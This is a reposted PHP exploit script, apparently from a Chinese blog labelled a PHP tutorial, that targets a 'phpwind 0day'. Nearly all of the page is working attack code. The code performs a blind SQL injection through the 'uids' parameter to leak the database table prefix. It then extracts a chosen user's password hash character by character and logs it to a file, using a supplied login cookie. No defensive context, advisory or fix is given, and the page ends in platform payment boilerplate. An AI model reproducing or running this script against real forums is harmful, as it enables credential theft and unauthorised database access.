php5.1 0day,从网上搜到的phpwind0day的代码_PHP教程

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;

$_GET['uid']&&$uid=$_GET['uid'];

$tid=539264;

$mask='没有查找匹配的内容';

$count=0;

//$testing=1;

//$testing=$_GET['test'];

if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";

$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];

if ($match[1]) echo 'Good Job!Wo Got The pre: '.$match[1]."

";

else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!

");

else {echo "Maybe It is not vul!

";die();}

echo "Try to Get the uid=$uid 's Password:";

$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)

{

$type=0;

$sub=$i+9;

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

$type=0;

for($m=48;$m<=57;$m++){

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

echo chr($m);

fputs($log,chr($m));

break;

}

continue;

}

continue;

}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";

$sql=urlencode($sql);

$temp=md5(rand(1,10000)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

$type=1;

for($m=97;$m<=122;$m++){

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

echo chr($m);

fputs($log,chr($m));

break;

}

continue;

}

continue;

}

echo "error!

";

die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}

fclose($log);

echo "

Done!We Post $count times!

";

function send($cmd)

{

global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;

$message = "POST ".$path."? HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Referer: http://".$server.$path."\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: ".$useragent."\r\n";

$message .= "Host: ".$server."\r\n";

$message .= "Content-length: ".strlen($cmd)."\r\n";

$message .= "Connection: Keep-Alive\r\n";

$message .= "Cookie: ".$cookie."\r\n";

$message .= "\r\n";

$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );

fputs($fd,$message);

$resp = "";

while($fd&&!feof($fd)) {

$resp .= fread($fd,1024);

}

fclose($fd);

$resp .="";

if($debug) {echo $cmd;echo $resp;}

return $resp;

}

?>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值